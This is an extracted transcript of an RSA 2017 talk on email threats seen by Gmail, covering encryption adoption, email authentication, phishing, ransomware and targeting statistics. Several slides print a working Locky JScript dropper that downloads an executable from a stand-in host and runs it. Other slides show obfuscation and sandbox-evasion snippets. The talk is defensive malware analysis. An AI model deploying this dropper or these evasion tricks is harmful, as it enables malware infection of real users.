targeted attacks against corporate inboxes - a gmail perspective rsa 2017
TRANSCRIPT
![Page 1: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/1.jpg)
Elie Bursztein with the help of many Googlers @elie
Targeted Attacks Against Corporate Inboxes - a Gmail Perspective
SESSION ID: HT-R11
![Page 2: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/2.jpg)
g.co/research/protect
1.X BILLION USERS
![Page 3: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/3.jpg)
g.co/research/protect
Stopping hundred of billions of attacks every week
![Page 4: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/4.jpg)
g.co/research/protect
1x
A corporate inbox receives 4.3x more malware than an end-user inbox
4.3x
![Page 5: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/5.jpg)
g.co/research/protect
Science related German companies get 9.6x more phishing attempts than their US counterpart
9.6x
1x
![Page 6: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/6.jpg)
g.co/research/protect
Highlight how various Gmail group of users exhibits different threat profiles
![Page 7: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/7.jpg)
g.co/research/protect
Global trends
![Page 8: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/8.jpg)
g.co/research/protect
Global trends
Organization trends
![Page 9: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/9.jpg)
g.co/research/protect
Global trends
Countries trends
Organization trends
![Page 10: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/10.jpg)
Global trends
![Page 11: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/11.jpg)
Spam
![Page 12: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/12.jpg)
PhishingSpam
![Page 13: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/13.jpg)
Phishing ImpersonationSpam
![Page 14: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/14.jpg)
Phishing MalwareImpersonationSpam
![Page 15: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/15.jpg)
Phishing InterceptionMalwareImpersonationSpam
![Page 16: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/16.jpg)
g.co/research/protect
Spam
![Page 17: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/17.jpg)
g.co/research/protect
Google embraces deep learning
Android Gmail Photos Maps NLP Robotics research Speech Translation YouTube … many others ...
![Page 18: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/18.jpg)
g.co/research/protect
Deep-learning for photos auto-tagging
“ocean”Deep ConvolutionalNeural Network
Automatic TagUser photo
![Page 19: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/19.jpg)
g.co/research/protect
Deep Learning power Google photos search
“Wow, the new Google photo search is a bit
insane. I didn’t tag those”
“Google photo search is awesome. Searched with
keyword drawing to find all my scribble at once :D”
![Page 20: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/20.jpg)
g.co/research/protect
![Page 21: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/21.jpg)
g.co/research/protect
Tensor power unit
We do deep-learning efficiently and at Google scale thanks to dedicated ASICs
https://cloudplatform.googleblog.com/2016/05/Google-supercharges-machine-learning-tasks-with-custom-chip.html
![Page 22: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/22.jpg)
Using deep-learning allows us stay ahead of spammers
![Page 23: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/23.jpg)
g.co/research/protect
Interception
![Page 24: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/24.jpg)
g.co/research/protect
Encrypting email in transit with STARTTLS
Sender (Alice)
![Page 25: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/25.jpg)
g.co/research/protect
Encrypting email in transit with STARTTLS
Sender (Alice)
Mail server (smtp.source.com)
![Page 26: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/26.jpg)
g.co/research/protect
Encrypting email in transit with STARTTLS
Mail server (smtp.destination.com)
Sender (Alice)
Mail server (smtp.source.com)
Recipient (Bob)
![Page 27: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/27.jpg)
g.co/research/protect
Encrypting email in transit with STARTTLS
Mail server (smtp.destination.com)
Eavesdropper (Eve)
Sender (Alice)
Mail server (smtp.source.com)
Recipient (Bob)
![Page 28: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/28.jpg)
g.co/research/protect
80% 87%
![Page 29: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/29.jpg)
g.co/research/protect
Transparency report - June 2014
https://googleblog.blogspot.com/2014/06/transparency-report-protecting-emails.html
![Page 30: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/30.jpg)
g.co/research/protect
Transparency report
Inbound traffic Outbound traffic
Frac
tion
of e
mai
l enc
rypt
ed
0%
10%
20%
30%
40%
50%
60%
70%
80%
90%
2013-12
2014-03
2014-06
2014-09
2014-12
2015-03
2015-06
2015-09
2015-12
2016-03
2016-06
2016-09
2016-12
![Page 31: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/31.jpg)
g.co/research/protect
Broken lock UI - February 2016
![Page 32: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/32.jpg)
g.co/research/protect
Broken lock UI
Inbound traffic Outbound traffic
Frac
tion
of e
mai
l enc
rypt
ed
0%
10%
20%
30%
40%
50%
60%
70%
80%
90%
2013-12
2014-03
2014-06
2014-09
2014-12
2015-03
2015-06
2015-09
2015-12
2016-03
2016-06
2016-09
2016-12
![Page 33: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/33.jpg)
Increasing encryption visibility helped speed-up adoption
![Page 34: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/34.jpg)
g.co/research/protect
Next: SMTP strict transport security
Prevent MITM using rogue certificate Like HTTPS pinning for email
Coming soon!
Industry wide effort via MAAWG and IETF Google, Microsoft, Yahoo, Comcast are all on board
![Page 35: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/35.jpg)
SMTP Strict Transport security is the next big milestone
![Page 36: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/36.jpg)
g.co/research/protect
Impersonation
![Page 37: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/37.jpg)
g.co/research/protect
DKIMDM
ARC
SPF
![Page 38: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/38.jpg)
g.co/research/protect
DKIMDM
ARC
SPF
Sign your email cryptographically
![Page 39: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/39.jpg)
g.co/research/protect
DKIMDM
ARC
SPF
Sign your email cryptographically
Specify which email servers to trust
![Page 40: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/40.jpg)
g.co/research/protect
DKIMDM
ARC
SPF
Sign your email cryptographically
Specify which email servers to trust
Define what to do with fake
emails
![Page 41: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/41.jpg)
g.co/research/protect
Surfacing authentication status
Authenticated Not authenticated
https://blog.google/products/gmail/making-email-safer-for-you-posted-by/
![Page 42: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/42.jpg)
g.co/research/protect
Authentication over-time
https://security.googleblog.com/2013/12/internet-wide-efforts-to-fight-email.html
Dec 2016Dec 2015Dec 2014
5.8% 2.8% 1.8%
![Page 43: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/43.jpg)
Most emails are authenticated
![Page 44: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/44.jpg)
DMARC adoption is too low
![Page 46: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/46.jpg)
g.co/research/protect
Phishing
![Page 47: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/47.jpg)
g.co/research/protect
![Page 48: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/48.jpg)
Targeted financial phishing is on the rise
![Page 49: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/49.jpg)
g.co/research/protect
Malware
![Page 50: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/50.jpg)
Ransomware largest malware threat
![Page 51: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/51.jpg)
g.co/research/protect
![Page 52: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/52.jpg)
g.co/research/protect
Lucky seen by Gmail vs Internet - May 2016
Normalized by number of email, a hash is potentially used in many email
emai
l
![Page 53: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/53.jpg)
g.co/research/protect
Locky is part of a complex ecosystem
LockyDridex
![Page 54: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/54.jpg)
g.co/research/protect
Locky vs Dridex daily pattern - May 2016
Locky
Dridex
![Page 55: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/55.jpg)
Rise of Javascript dropper as a means to evade anti-virus
![Page 56: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/56.jpg)
g.co/research/protect
Anatomy of a Locky dropper
var shell = new ActiveXObject("WScript.Shell");var tmpDir = shell.ExpandEnvironmentStrings("%TEMP%");// fetch the payloadvar xhr = new ActiveXObject("MSXML2.XMLHTTP");xhr.open("GET","http://shady.ru/payload.exe",false);xhr.send(null);var payload = xhr.responseBody;// write payload to diskvar writer = ActiveXObject("ADODB.Stream");writer.open();writer.type = 2;writer.write(payload);writer.SaveToFile(tmpDir + "\\payload.exe");// execute the payloadshell.Run(tmpDir + "\\payload.exe", "", false);
![Page 57: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/57.jpg)
g.co/research/protect
Anatomy of a Locky dropper
var shell = new ActiveXObject("WScript.Shell");var tmpDir = shell.ExpandEnvironmentStrings("%TEMP%");// fetch the payloadvar xhr = new ActiveXObject("MSXML2.XMLHTTP");xhr.open("GET","http://shady.ru/payload.exe",false);xhr.send(null);var payload = xhr.responseBody;// write payload to diskvar writer = ActiveXObject("ADODB.Stream");writer.open();writer.type = 2;writer.write(payload);writer.SaveToFile(tmpDir + "\\payload.exe");// execute the payloadshell.Run(tmpDir + "\\payload.exe", "", false);
Get temp directory
![Page 58: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/58.jpg)
g.co/research/protect
Anatomy of a Locky dropper
var shell = new ActiveXObject("WScript.Shell");var tmpDir = shell.ExpandEnvironmentStrings("%TEMP%");// fetch the payloadvar xhr = new ActiveXObject("MSXML2.XMLHTTP");xhr.open("GET","http://shady.ru/payload.exe",false);xhr.send(null);var payload = xhr.responseBody;// write payload to diskvar writer = ActiveXObject("ADODB.Stream");writer.open();writer.type = 2;writer.write(payload);writer.SaveToFile(tmpDir + "\\payload.exe");// execute the payloadshell.Run(tmpDir + "\\payload.exe", "", false);
Get temp directory
Fetch payload
![Page 59: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/59.jpg)
g.co/research/protect
Anatomy of a Locky dropper
var shell = new ActiveXObject("WScript.Shell");var tmpDir = shell.ExpandEnvironmentStrings("%TEMP%");// fetch the payloadvar xhr = new ActiveXObject("MSXML2.XMLHTTP");xhr.open("GET","http://shady.ru/payload.exe",false);xhr.send(null);var payload = xhr.responseBody;// write payload to diskvar writer = ActiveXObject("ADODB.Stream");writer.open();writer.type = 2;writer.write(payload);writer.SaveToFile(tmpDir + "\\payload.exe");// execute the payloadshell.Run(tmpDir + "\\payload.exe", "", false);
Get temp directory
Fetch payload
Write payload to disk
![Page 60: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/60.jpg)
g.co/research/protect
Anatomy of a Locky dropper
var shell = new ActiveXObject("WScript.Shell");var tmpDir = shell.ExpandEnvironmentStrings("%TEMP%");// fetch the payloadvar xhr = new ActiveXObject("MSXML2.XMLHTTP");xhr.open("GET","http://shady.ru/payload.exe",false);xhr.send(null);var payload = xhr.responseBody;// write payload to diskvar writer = ActiveXObject("ADODB.Stream");writer.open();writer.type = 2;writer.write(payload);writer.SaveToFile(tmpDir + "\\payload.exe");// execute the payloadshell.Run(tmpDir + "\\payload.exe", "", false);
Get temp directory
Fetch payload
Execute payload
Write payload to disk
![Page 61: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/61.jpg)
g.co/research/protect
![Page 62: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/62.jpg)
g.co/research/protect
![Page 63: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/63.jpg)
g.co/research/protect
Locky May 5th attack
20 000 m/h
Internal detector Commercial Anti-virus
Num
ber o
f em
ail b
lock
ed
1x
10x
100x
1000x
04-05 23:00
04-06 0:00
04-06 1:00
04-06 2:00
04-06 3:00
04-06 4:00
04-06 5:00
04-06 6:00
04-06 7:00
04-06 8:00
04-06 9:00
04-06 10:00
04-06 11:00
04-06 12:00
04-06 13:00
04-06 14:00
04-06 15:00
04-06 16:00
04-06 17:00
04-06 18:00
![Page 64: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/64.jpg)
g.co/research/protect
30 000 000 m/hLocky May 5th attack
20 000 m/h
Internal detector Commercial Anti-virus
Num
ber o
f em
ail b
lock
ed
1x
10x
100x
1000x
04-05 23:00
04-06 0:00
04-06 1:00
04-06 2:00
04-06 3:00
04-06 4:00
04-06 5:00
04-06 6:00
04-06 7:00
04-06 8:00
04-06 9:00
04-06 10:00
04-06 11:00
04-06 12:00
04-06 13:00
04-06 14:00
04-06 15:00
04-06 16:00
04-06 17:00
04-06 18:00
![Page 65: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/65.jpg)
g.co/research/protect
Evasion attempts via file type switch
![Page 66: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/66.jpg)
g.co/research/protect
AV DDOS exploit via malicious comments
Comment sample
![Page 67: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/67.jpg)
g.co/research/protect
Javascript obfuscation - Property access
String.prototype.foo = function() { return this.substr(1,1); };namespaces = ('a', 'b', "ip");select = "W";fireWith = "gt".foo();origName = (fireWith.split((1,"b")), "Scr");mozMatchesSelector = (((18 ^ rbracket), (1332 / delegateTarget)), (((162, rscriptType) / (13 & preFilter)), this));bind = mozMatchesSelector[select + origName + namespaces + fireWith];…subtract = bind[noConflict + finalDataType + percent](define + focusin + clientTop);…slideUp = subtract[mouseenter + andSelf + isReady + fireWith + matchesSelector + matchIndexes](JSON + ownerDocument) + file + now;
WScript
![Page 68: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/68.jpg)
g.co/research/protect
Sandbox detection va timer check
var t1 = new Date().getMilliseconds(); WScript.Sleep(10); var t2 = new Date().getMilliseconds(); if (t2-t1 <= 10) WScript.Quit();
HoneyClients don't sleep
Emulation detected!
![Page 69: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/69.jpg)
g.co/research/protect
OS check via the use of Jscript specific behavior
b(); var greet = (function b() { }, "hello");
b is defined and hoisted only in JScript
b.foo(); var greet = (function b() { }, "hello"); function b.prototype.foo() { } not valid ES3/5/6
http.option(1) = true not valid ES6
![Page 70: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/70.jpg)
Organizational trends
![Page 71: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/71.jpg)
g.co/research/protect
Professional inbox are 6.2x more targeted by phishing and 4.3x more targeted by malware than end user inbox
1.0x
1.0x
1.0x
0.4x
6.2x
4.3x
GSuiteGmail
Spam
Phishing
Malware
![Page 72: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/72.jpg)
Organization type insights
![Page 73: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/73.jpg)
g.co/research/protect
A corporate inbox is 3.2x more targeted by phishing email than an EDU inbox
1.0x
1.8x
1.2x
3.2x
Education
Governement related
Non Profit
Company
![Page 74: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/74.jpg)
g.co/research/protect
Non-profit inboxes are 2.3x more targeted by malware than corporate inboxes
2.1x
1.3x
2.3x
1.0x
Education
Governement related
Non Profit
Company
![Page 75: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/75.jpg)
g.co/research/protect
A corporate inbox receive 3.1x more encrypted emails than an EDU inbox
1.0x
1.2x
1.3x
3.1x
Education
Governement related
Non Profit
Company
![Page 76: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/76.jpg)
Company sectors insights
![Page 77: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/77.jpg)
g.co/research/protect
Entertainment, IT and housing related companies are the most targeted by spam as of Q1 2017
1.0x1.3x
1.5x1.5x1.5x
1.7x1.8x
2.2x2.5x2.6x2.6x2.6x
2.7x4.3x
4.9x6.1x
UtilitiesFinance and Insurance
Natural ressourcesManufacturingAdministrative
Wholesale TradeManagement
TransportationScience
ConstructionAccommodation & Food
HealthRetail Trade
HousingInformation Technology
Entertainment
![Page 78: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/78.jpg)
g.co/research/protect
Finance, Arts and IT related companies are the most targeted by phishing as of Q1 2017
1.0x8.6x
1.2x1.8x
1.6x1.9x
1.4x4.9x
2.8x1.8x
1.5x3.3x
2.8x4.3x
6.9x7.6x
UtilitiesFinance and Insurance
Natural ressourcesManufacturingAdministrative
Wholesale TradeManagement
TransportationScience
ConstructionAccommodation & Food
HealthRetail Trade
HousingInformation Technology
Entertainment
![Page 79: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/79.jpg)
g.co/research/protect
Volume of phishing attempts depend of country and sector
> 10x
1.0x
1.8x
2.8x
3.2x
3.2x
4.4x
5.8x
1.9x
1.4x
1.2x
1.0x
1.7x
1.2x
Finance sector IT sector
France
Canada
USA
India
UK
Japan
Brazil
![Page 80: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/80.jpg)
g.co/research/protect
Entertainment and utilities related companies are the one who received the most encrypted emails as of Q1 2017
1.3x1.0x
1.2x1.2x
1.2x1.2x
1.3x1.3x
1.3x1.1x
1.3x1.2x
1.2x1.1x
1.2x1.3x
UtilitiesFinance and Insurance
Natural ressourcesManufacturingAdministrative
Wholesale TradeManagement
TransportationScience
ConstructionAccommodation & Food
HealthRetail Trade
HousingInformation Technology
Entertainment
![Page 81: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/81.jpg)
g.co/research/protect
Real estate is by far the sector that is the most targeted by malware as of Q1 2017
1.0x
1.1x
1.2x
1.3x
1.4x
1.7x
1.7x
2.0x
2.2x
2.2x
2.3x
2.4x
3.6x
4.5x
Science
Health Care
Wholesale Trade
Entertainment
Finance and Insurance
Manufacturing
Information Technology
Administrative
Mining
Accommodation and Food
Retail Trade
Utilities
Construction
Transportation
Real Estate > 10x
![Page 82: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/82.jpg)
Countries trends
![Page 83: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/83.jpg)
g.co/research/protect
EU is not at the forefront of email security
STARTTLS DKIM
1.2x
1.1x
1.0x
1.2x
1.1x
1.0x
1.1x
1.1x
1.1x
1.1x
USA
Japan
Brazil
India
UK
France
Canada
Germany
Korea
Australia
1.4x
1.0x
1.6x
1.6x
1.3x
1.4x
1.5x
1.2x
1.6x
1.5x
USA
Japan
Brazil
India
UK
France
Canada
Germany
Korea
Australia
![Page 84: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/84.jpg)
g.co/research/protect
India and Japan have the most spammed Inboxes as of Q1 2017
2.0x
4.1x
2.7x
3.8x
1.3x
1.0x
1.6x
1.2x
1.8x
1.1x
USA
Japan
Brazil
India
UK
France
Canada
Germany
Korea
Australia
![Page 85: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/85.jpg)
g.co/research/protect
The largest spammers in the world target other countries
1. USA 2. Germany 3. France 4. Japan 5. United Kingdom 6. Roumania 7. Spain 8. Brazil 9. Canada 10.Russia
![Page 86: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/86.jpg)
g.co/research/protect
Japan inboxes are heavily targeted by phishing as of Q1 2017.
2.1x
5.9x
3.5x
1.7x
1.9x
1.0x
3.0x
1.6x
1.1x
1.7x
USA
Japan
Brazil
India
UK
France
Canada
Germany
Korea
Australia
